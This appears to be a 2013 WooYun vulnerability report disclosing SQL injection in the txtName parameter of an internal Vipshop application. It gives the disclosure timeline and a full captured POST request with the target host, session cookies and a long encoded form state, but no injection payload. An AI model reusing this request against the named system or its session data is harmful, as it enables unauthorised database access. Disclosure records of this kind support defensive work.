
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-042085

Title: SQL injection in one of 唯品会 (Vipshop)'s business systems

Vendor: 唯品会 (Vipshop)

Author: loli

Submitted: 2013-11-05 20:14

Fixed: 2013-12-20 20:15

Published: 2013-12-20 20:15

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-11-05: Details sent to the vendor, awaiting the vendor's handling
2013-11-05: Vendor confirmed; details disclosed to the vendor only
2013-11-15: Details disclosed to core white hats and experts in the relevant field
2013-11-25: Details disclosed to regular white hats
2013-12-05: Details disclosed to intern white hats
2013-12-20: Details disclosed to the public

Brief description:

SQL injection at Vipshop

Detailed description:

I found this sub-site by following the calls in a JS file. I only queried the current database user and the database name; the database names alone give a fair idea of what is stored there, so I stopped at that point.
The request is a POST, and the txtName parameter is vulnerable to SQL injection.

POST /Service/CmpntListService.aspx?appKey=APP00008&jsapiurl=http%3a%2f%2fworkspace.oa.vipshop.com%3a6060%2fScripts%2fwp.sdk.js&proxyUrl=http%3a%2f%2fworkspace.oa.vipshop.com%3a6060%2fproxy.htm&ownerType=employee&owner=&containerCode=81aa4b54-c708-485b-ae56-849da23b657f&areaCode=GR-2&position=0 HTTP/1.1
Host: appcenter.oa.vipshop.com:6060
Proxy-Connection: keep-alive
Content-Length: 14708
Origin: http://appcenter.oa.vipshop.com:6060
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://appcenter.oa.vipshop.com:6060/Service/CmpntListService.aspx?appKey=APP00008&jsapiurl=http%3a%2f%2fworkspace.oa.vipshop.com%3a6060%2fScripts%2fwp.sdk.js&proxyUrl=http%3a%2f%2fworkspace.oa.vipshop.com%3a6060%2fproxy.htm&ownerType=employee&owner=&containerCode=81aa4b54-c708-485b-ae56-849da23b657f&areaCode=GR-2&position=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: vip_wh=VIP_NH; vip_rip=2xxxxxxxx; vip_ipver=31; PAPVisitorId=117b0dcb85bbd6d8bd8eb671170c5948; vip_new_old_user=1; vip_new_b_user=1; _jzqco=%7C%7C%7C%7C%7C1.1399621424.1382969926338.1382972288711.1382972419911.1382972288711.1382972419911.0.0.0.7.7; s_nr=1382972469472; mars_pid=68; mars_cid=2980e92f07c14b29632cf85099f38942; __utma=96440987.927026635.1382969927.1382971057.1383212045.4; __utmz=96440987.1383212045.4.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); ASP.NET_SessionId=xecgem33teon5fzp4w11ky1t
sm=UpdatePanel1%7CbtnSearch&txtName=S2&hidAppKey=APP00007&hfAddedClose=1&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTE2Njg5ODkzNA8WEB4GYXBwS2V5BQhBUFAwMDAwOB4NY29udGFpbmVyQ29kZQUkODFhYTRiNTQtYzcwOC00ODViLWFlNTYtODQ5ZGEyM2I2NTdmHghhcmVhQ29kZQUER1ItMh4IcG9zaXRpb24FATAeBW93bmVyZR4Jb3duZXJ0eXBlBQhlbXBsb3llZR4DdXNyZB4KdXNlZENtcG50czL7RAABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABOU3lzdGVtLkRhdGEsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAVU3lzdGVtLkRhdGEuRGF0YVRhYmxlAwAAABlEYXRhVGFibGUuUmVtb3RpbmdWZXJzaW9uCVhtbFNjaGVtYQtYbWxEaWZmR3JhbQMBAQ5TeXN0ZW0uVmVyc2lvbgIAAAAJAwAAAAYEAAAAmw48P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjx4czpzY2hlbWEgeG1sbnM9IiIgeG1sbnM6eHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSI%2BDQogIDx4czplbGVtZW50IG5hbWU9ImRzIj4NCiAgICA8eHM6Y29tcGxleFR5cGU%2BDQogICAgICA8eHM6c2VxdWVuY2U%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9ImlkIiBtc2RhdGE6RGF0YVR5cGU9IlN5c3RlbS5HdWlkLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9ImFwcEtleSIgdHlwZT0ieHM6c3RyaW5nIiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iY29udGFpbmVyQ29kZSIgdHlwZT0ieHM6c3RyaW5nIiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iYXJlYUNvZGUiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9InBvc2l0aW9uIiB0eXBlPSJ4czppbnQiIG1zZGF0YTp0YXJnZXROYW1lc3BhY2U9IiIgbWluT2NjdXJzPSIwIiAvPg0KICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJjb21wb25lbnRDbGFzc0lkIiBtc2RhdGE6RGF0YVR5cGU9IlN5c3RlbS5HdWlkLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY
2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9Im93bmVyIiB0eXBlPSJ4czpzdHJpbmciIG1zZGF0YTp0YXJnZXROYW1lc3BhY2U9IiIgbWluT2NjdXJzPSIwIiAvPg0KICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJvd25lclR5cGUiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9ImNyZWF0ZU9uIiB0eXBlPSJ4czpkYXRlVGltZSIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9InN0YXR1cyIgdHlwZT0ieHM6aW50IiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0idW5pbnN0YWxsT24iIHR5cGU9InhzOmRhdGVUaW1lIiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgIDwveHM6c2VxdWVuY2U%2BDQogICAgPC94czpjb21wbGV4VHlwZT4NCiAgPC94czplbGVtZW50Pg0KICA8eHM6ZWxlbWVudCBuYW1lPSJ0bXBEYXRhU2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6TWFpbkRhdGFUYWJsZT0iZHMiIG1zZGF0YTpVc2VDdXJyZW50TG9jYWxlPSJ0cnVlIj4NCiAgICA8eHM6Y29tcGxleFR5cGU%2BDQogICAgICA8eHM6Y2hvaWNlIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSJ1bmJvdW5kZWQiIC8%2BDQogICAgPC94czpjb21wbGV4VHlwZT4NCiAgPC94czplbGVtZW50Pg0KPC94czpzY2hlbWE%2BBgUAAACzNDxkaWZmZ3I6ZGlmZmdyYW0geG1sbnM6bXNkYXRhPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1tc2RhdGEiIHhtbG5zOmRpZmZncj0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtZGlmZmdyYW0tdjEiPg0KICA8dG1wRGF0YVNldD4NCiAgICA8ZHMgZGlmZmdyOmlkPSJkczEiIG1zZGF0YTpyb3dPcmRlcj0iMCI%2BDQogICAgICA8aWQ%2BZDJiMGExZTItNWUzNS00YzFmLWE2OWUtMTk3NzE3M2Y0MGViPC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj41PC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPjE4MGFhZDRkLTFkMzItNDY3OS05ODdhLTBiMDIzMTMyNWI1MjwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDYtMjRUMDA6MzM6MDcuODE3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMyI
iBtc2RhdGE6cm93T3JkZXI9IjEiPg0KICAgICAgPGlkPmNjODRjZjFjLWVkYzgtNGVkNi1hODBhLTQ1Njk5Mzg1ZDBlNTwvaWQ%2BDQogICAgICA8YXBwS2V5PkFQUDAwMDA4PC9hcHBLZXk%2BDQogICAgICA8Y29udGFpbmVyQ29kZT44MWFhNGI1NC1jNzA4LTQ4NWItYWU1Ni04NDlkYTIzYjY1N2Y8L2NvbnRhaW5lckNvZGU%2BDQogICAgICA8YXJlYUNvZGU%2BR1ItMjwvYXJlYUNvZGU%2BDQogICAgICA8cG9zaXRpb24%2BNzwvcG9zaXRpb24%2BDQogICAgICA8Y29tcG9uZW50Q2xhc3NJZD42YzVjZTRjNy1iMTdlLTQyYWQtOWUyYy03NzFjODExZjE4MDU8L2NvbXBvbmVudENsYXNzSWQ%2BDQogICAgICA8b3duZXIgLz4NCiAgICAgIDxvd25lclR5cGU%2BZW1wbG95ZWU8L293bmVyVHlwZT4NCiAgICAgIDxjcmVhdGVPbj4yMDEzLTA2LTI0VDAwOjMzOjA3LjgzMyswODowMDwvY3JlYXRlT24%2BDQogICAgICA8c3RhdHVzPjA8L3N0YXR1cz4NCiAgICA8L2RzPg0KICAgIDxkcyBkaWZmZ3I6aWQ9ImRzMyIgbXNkYXRhOnJvd09yZGVyPSIyIj4NCiAgICAgIDxpZD44ZDBkOGRmOC02MTgzLTQyZWMtYWI1NS00NTk3YjNlNzU4ODI8L2lkPg0KICAgICAgPGFwcEtleT5BUFAwMDAwODwvYXBwS2V5Pg0KICAgICAgPGNvbnRhaW5lckNvZGU%2BODFhYTRiNTQtYzcwOC00ODViLWFlNTYtODQ5ZGEyM2I2NTdmPC9jb250YWluZXJDb2RlPg0KICAgICAgPGFyZWFDb2RlPkdSLTI8L2FyZWFDb2RlPg0KICAgICAgPHBvc2l0aW9uPjI8L3Bvc2l0aW9uPg0KICAgICAgPGNvbXBvbmVudENsYXNzSWQ%2BNjllNzg0YTUtMzFjMi00Y2U1LTgxNTktNzliMjNhOTM1NWY3PC9jb21wb25lbnRDbGFzc0lkPg0KICAgICAgPG93bmVyIC8%2BDQogICAgICA8b3duZXJUeXBlPmVtcGxveWVlPC9vd25lclR5cGU%2BDQogICAgICA8Y3JlYXRlT24%2BMjAxMy0wNi0yNFQwMDozMzowNy43ODMrMDg6MDA8L2NyZWF0ZU9uPg0KICAgICAgPHN0YXR1cz4wPC9zdGF0dXM%2BDQogICAgPC9kcz4NCiAgICA8ZHMgZGlmZmdyOmlkPSJkczQiIG1zZGF0YTpyb3dPcmRlcj0iMyI%2BDQogICAgICA8aWQ%2BYTljZmYzNTktNGEwOC00NTlmLWExMTQtNTI1NWY0MzhjNmI5PC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj4yPC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPjZjNWNlNGM3LWIxN2UtNDJhZC05ZTJjLTc3MWM4MTFmMTgwNTwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMTEtMDVUMDE6MTM6NTQuMDQ3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzP
g0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHM1IiBtc2RhdGE6cm93T3JkZXI9IjQiPg0KICAgICAgPGlkPjczYzMzMzVlLTMwYWItNGU3NC1hODQxLTUyY2UyYThlNjYxMDwvaWQ%2BDQogICAgICA8YXBwS2V5PkFQUDAwMDA4PC9hcHBLZXk%2BDQogICAgICA8Y29udGFpbmVyQ29kZT44MWFhNGI1NC1jNzA4LTQ4NWItYWU1Ni04NDlkYTIzYjY1N2Y8L2NvbnRhaW5lckNvZGU%2BDQogICAgICA8YXJlYUNvZGU%2BR1ItMjwvYXJlYUNvZGU%2BDQogICAgICA8cG9zaXRpb24%2BODwvcG9zaXRpb24%2BDQogICAgICA8Y29tcG9uZW50Q2xhc3NJZD5kZjhjM2NjZi0yNjliLTQ2MTMtOWNmYS1lZTUxODk1NTNjMjU8L2NvbXBvbmVudENsYXNzSWQ%2BDQogICAgICA8b3duZXIgLz4NCiAgICAgIDxvd25lclR5cGU%2BZW1wbG95ZWU8L293bmVyVHlwZT4NCiAgICAgIDxjcmVhdGVPbj4yMDEzLTA2LTI0VDAwOjMzOjA3LjgzMyswODowMDwvY3JlYXRlT24%2BDQogICAgICA8c3RhdHVzPjA8L3N0YXR1cz4NCiAgICA8L2RzPg0KICAgIDxkcyBkaWZmZ3I6aWQ9ImRzNiIgbXNkYXRhOnJvd09yZGVyPSI1Ij4NCiAgICAgIDxpZD40MTQyMTk0NC01MWM1LTQ2MTAtYjFlYy02MGM2ZWJhNmY2MDM8L2lkPg0KICAgICAgPGFwcEtleT5BUFAwMDAwODwvYXBwS2V5Pg0KICAgICAgPGNvbnRhaW5lckNvZGU%2BODFhYTRiNTQtYzcwOC00ODViLWFlNTYtODQ5ZGEyM2I2NTdmPC9jb250YWluZXJDb2RlPg0KICAgICAgPGFyZWFDb2RlPkdSLTI8L2FyZWFDb2RlPg0KICAgICAgPHBvc2l0aW9uPjE8L3Bvc2l0aW9uPg0KICAgICAgPGNvbXBvbmVudENsYXNzSWQ%2BNmM1Y2U0YzctYjE3ZS00MmFkLTllMmMtNzcxYzgxMWYxODA1PC9jb21wb25lbnRDbGFzc0lkPg0KICAgICAgPG93bmVyIC8%2BDQogICAgICA8b3duZXJUeXBlPmVtcGxveWVlPC9vd25lclR5cGU%2BDQogICAgICA8Y3JlYXRlT24%2BMjAxMy0wNi0yNFQwMDozMzo1MS4xMjMrMDg6MDA8L2NyZWF0ZU9uPg0KICAgICAgPHN0YXR1cz4wPC9zdGF0dXM%2BDQogICAgPC9kcz4NCiAgICA8ZHMgZGlmZmdyOmlkPSJkczciIG1zZGF0YTpyb3dPcmRlcj0iNiI%2BDQogICAgICA8aWQ%2BNGEwNmI5M2UtNWQwMi00NTIxLWEzOGUtNmZmZWRjZGNhMjk2PC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj4xPC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPmE4ZWJjYmE5LWUyYjMtNDIwZS04YzkzLTI0NmM1ZWRmOWJlNjwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDYtMjRUMDA6MzM6MDcuNzUzKzA4OjAwP
C9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHM4IiBtc2RhdGE6cm93T3JkZXI9IjciPg0KICAgICAgPGlkPjIyNjM5ZjVmLWEwYjctNDZjZC1iYmViLTc3ZWY4NzM5YzAzNjwvaWQ%2BDQogICAgICA8YXBwS2V5PkFQUDAwMDA4PC9hcHBLZXk%2BDQogICAgICA8Y29udGFpbmVyQ29kZT44MWFhNGI1NC1jNzA4LTQ4NWItYWU1Ni04NDlkYTIzYjY1N2Y8L2NvbnRhaW5lckNvZGU%2BDQogICAgICA8YXJlYUNvZGU%2BR1ItMjwvYXJlYUNvZGU%2BDQogICAgICA8cG9zaXRpb24%2BNDwvcG9zaXRpb24%2BDQogICAgICA8Y29tcG9uZW50Q2xhc3NJZD5mNzM0ZTQzZC1mNmE4LTRmOTYtODUxNC1jZTRmYWJiZDViY2U8L2NvbXBvbmVudENsYXNzSWQ%2BDQogICAgICA8b3duZXIgLz4NCiAgICAgIDxvd25lclR5cGU%2BZW1wbG95ZWU8L293bmVyVHlwZT4NCiAgICAgIDxjcmVhdGVPbj4yMDEzLTA2LTI0VDAwOjMzOjA3LjgrMDg6MDA8L2NyZWF0ZU9uPg0KICAgICAgPHN0YXR1cz4wPC9zdGF0dXM%2BDQogICAgPC9kcz4NCiAgICA8ZHMgZGlmZmdyOmlkPSJkczkiIG1zZGF0YTpyb3dPcmRlcj0iOCI%2BDQogICAgICA8aWQ%2BZGI5ZGEyZGEtYWVmNC00MDIwLWJlYmUtODcyMDdkYzA3NmVlPC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj4xPC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPmY3MzRlNDNkLWY2YTgtNGY5Ni04NTE0LWNlNGZhYmJkNWJjZTwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMTEtMDVUMDE6MTM6NDkuMTk3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMxMCIgbXNkYXRhOnJvd09yZGVyPSI5Ij4NCiAgICAgIDxpZD5lNzI4MmZiMS0xODljLTRiM2UtOWRkNS05ODg2YWEzOTlkY2U8L2lkPg0KICAgICAgPGFwcEtleT5BUFAwMDAwODwvYXBwS2V5Pg0KICAgICAgPGNvbnRhaW5lckNvZGU%2BODFhYTRiNTQtYzcwOC00ODViLWFlNTYtODQ5ZGEyM2I2NTdmPC9jb250YWluZXJDb2RlPg0KICAgICAgPGFyZWFDb2RlPkdSLTI8L2FyZWFDb2RlPg0KICAgICAgPHBvc2l0aW9uPjM8L3Bvc2l0aW9uPg0KICAgICAgPGNvbXBvbmVudENsYXNzSWQ%2BNWI3NTBhZjgtNTllMi00NTQxLThlNjgtYTEzNDhhMzAxNzFlPC9jb21wb25lbnRDbGFzc0lkPg0KICAgICAgPG93bmVyIC8%2BDQogICAgICA8b3duZXJUeXBlPmVtcGxveWVlPC9vd25lclR5cGU%2BDQogICAgICA8Y3J
lYXRlT24%2BMjAxMy0wNi0yNFQwMDozMzowNy44KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMxMSIgbXNkYXRhOnJvd09yZGVyPSIxMCI%2BDQogICAgICA8aWQ%2BNjYxYjFmYWMtNTUzYi00ZTc3LThjZTAtYTA4ODNlZGUzOTk3PC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj42PC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPmJjNTU3NDYwLTE5YjctNDZmOS04MTljLWFiNzlhMDRmN2IyYTwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDYtMjRUMDA6MzM6MDcuODE3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMxMiIgbXNkYXRhOnJvd09yZGVyPSIxMSI%2BDQogICAgICA8aWQ%2BMjljMDBhMTAtYjMyOS00MGE2LWFjNmItY2FmYTU2YWFhMmUxPC9pZD4NCiAgICAgIDxhcHBLZXk%2BQVBQMDAwMDg8L2FwcEtleT4NCiAgICAgIDxjb250YWluZXJDb2RlPjgxYWE0YjU0LWM3MDgtNDg1Yi1hZTU2LTg0OWRhMjNiNjU3ZjwvY29udGFpbmVyQ29kZT4NCiAgICAgIDxhcmVhQ29kZT5HUi0yPC9hcmVhQ29kZT4NCiAgICAgIDxwb3NpdGlvbj45PC9wb3NpdGlvbj4NCiAgICAgIDxjb21wb25lbnRDbGFzc0lkPjZjNGJhYzIyLWM1MWYtNGQ5NC05MWQ5LTc2YzliOGQ4YTAwNDwvY29tcG9uZW50Q2xhc3NJZD4NCiAgICAgIDxvd25lciAvPg0KICAgICAgPG93bmVyVHlwZT5lbXBsb3llZTwvb3duZXJUeXBlPg0KICAgICAgPGNyZWF0ZU9uPjIwMTMtMDYtMjRUMDA6MzM6MDcuODQ3KzA4OjAwPC9jcmVhdGVPbj4NCiAgICAgIDxzdGF0dXM%2BMDwvc3RhdHVzPg0KICAgIDwvZHM%2BDQogICAgPGRzIGRpZmZncjppZD0iZHMxMyIgbXNkYXRhOnJvd09yZGVyPSIxMiI%2BDQogICAgICA8aWQ%2BNTFhOTZmMTItODg4Ny00MzI0LWJlZTMtZGM2N2ZiMTYzYjA0PC9pZD4NCiAgICAgIDxhcHBLZXk%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%2BDQogICAgPC9kcz4NCiAgPC90bXBEYXRhU2V0Pg0KPC9kaWZmZ3I6ZGlmZmdyYW0%2BBAMAAAAOU3lzdGVtLlZlcnNpb24EAAAABl9NYWpvcgZfTWlub3IGX0J1aWxkCV9SZXZpc2lvbgAAAAAICAgIAgAAAAAAAAD%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwsWAmYPZBYCAgMPZBYCZg9kFgQCBQ8WAh4LXyFJdGVtQ291bnQCAxYGAgEPZBYGAgEPFgIeBXZhbHVlBSQ2YzVjZTRjNy1iMTdlLTQyYWQtOWUyYy0
3NzFjODExZjE4MDVkAgIPFQZNVXBsb2FkL0NtcG50SW1hZ2VzL2ljb25hZGRkMWY1NC1hZTRjLTRkNWEtYTA4OC02ZWViMDhlODQwMGMyMDExMTIwNTA1MDgxNy5wbmckNmM1Y2U0YzctYjE3ZS00MmFkLTllMmMtNzcxYzgxMWYxODA1D1MyLeeUs%2Bivt%2BiusOW9lTDln7rkuo7mlrDlvJXmk47nmoTlt6XkvZzmtYHnlLPor7fliJfooajnu4Tku7bvvIEw5Z%2B65LqO5paw5byV5pOO55qE5bel5L2c5rWB55Sz6K%2B35YiX6KGo57uE5Lu277yBCeW3sua3u%2BWKoGQCAw8PFgIeD0NvbW1hbmRBcmd1bWVudAUkNmM1Y2U0YzctYjE3ZS00MmFkLTllMmMtNzcxYzgxMWYxODA1ZGQCAg9kFgYCAQ8WAh8JBSRkZjhjM2NjZi0yNjliLTQ2MTMtOWNmYS1lZTUxODk1NTNjMjVkAgIPFQZNVXBsb2FkL0NtcG50SW1hZ2VzL2ljb25kMjVmYTYxOC02MTZiLTQyMGYtYmFiMS00ZTMwZDdjZjE2YTIyMDExMTIwNTA1MTcwMi5wbmckZGY4YzNjY2YtMjY5Yi00NjEzLTljZmEtZWU1MTg5NTUzYzI1D1MyLeW%2BhemYheaUtuaWhyrln7rkuo7mlrDlvJXmk47nmoTlt6XkvZzmtYHmlLbmlofnu4Tku7bvvIEq5Z%2B65LqO5paw5byV5pOO55qE5bel5L2c5rWB5pS25paH57uE5Lu277yBCeW3sua3u%2BWKoGQCAw8PFgIfCgUkZGY4YzNjY2YtMjY5Yi00NjEzLTljZmEtZWU1MTg5NTUzYzI1ZGQCAw9kFgYCAQ8WAh8JBSQ2YzRiYWMyMi1jNTFmLTRkOTQtOTFkOS03NmM5YjhkOGEwMDRkAgIPFQZNVXBsb2FkL0NtcG50SW1hZ2VzL2ljb25jNjUxMDczOS05MGM2LTQzM2QtYjg4Mi1lNDExNThiMGI1MjcyMDExMTIwNTA1MDk0NS5wbmckNmM0YmFjMjItYzUxZi00ZDk0LTkxZDktNzZjOWI4ZDhhMDA0ElMyLeW%2BheWuoeaJuea1geeoizDmlrDlvJXmk47lr7nlupTnmoTku6Plip7lt6XkvZzpobnliJfooajnu4Tku7bvvIEw5paw5byV5pOO5a%2B55bqU55qE5Luj5Yqe5bel5L2c6aG55YiX6KGo57uE5Lu277yBCeW3sua3u%2BWKoGQCAw8PFgIfCgUkNmM0YmFjMjItYzUxZi00ZDk0LTkxZDktNzZjOWI4ZDhhMDA0ZGQCBw8PFgYeC1JlY29yZENvdW50BQEzHhBDdXJyZW50UGFnZUluZGV4BQExHglQYWdlQ291bnQFATFkFgJmD2QWEAIBDw8WBh4IQ3NzQ2xhc3MFDWN1dGVwYWdlIHByZXYeB0VuYWJsZWRoHgRfIVNCAgJkZAIDDxYCHgdWaXNpYmxlaGQCBQ8WAh8RaGQCBw8WAh8IAgEWAmYPZBYCAgEPDxYIHwoFATEfDgUIc2VsZWN0ZWQfD2gfEAICZBYCZg8VAQExZAIJDxYCHxFoZAILDxYCHxFoZAINDw8WBh8OBQ1jdXRlcGFnZSBuZXh0Hw9oHxACAmRkAg8PDxYCHgRUZXh0BRvnrKwx6aG1Jm5ic3A7LyZuYnNwO%2BWFsTHpobVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUhcnBDbXBudExpc3RTZXJpdmUkY3RsMDAkY2hrU2VsZWN0BSFycENtcG50TGlzdFNlcml2ZSRjdGwwMSRjaGtTZWxlY3QFIXJwQ21wbnRMaXN0U2VyaXZlJGN0bDAyJGNoa1NlbGVjdAUhcnBDbXBudExpc3RTZXJpdmUkY3RsMDMkY2hrU2VsZWN0G9QElKGWlxQQxGWPNi1
684T2Mx6kv8U2K8Xb7qo67%2B0%3D&__EVENTVALIDATION=%2FwEWDQKZioz9CALEhISFCwKln%2FPuCgLXn6C%2FCAKy%2Fui0AwL29I3hBAKtrpq3CwKZoI7WDQKIjeOsBgLU4vHDAgK1maGbBALV7vWfDwKQhN7uB4RzJZ%2FabknILKzlkmB3qA9pheJ80Nv4AuIql%2BKD%2BHbb&__ASYNCPOST=true&btnSearch=%E6%90%9C%E7%B4%A2
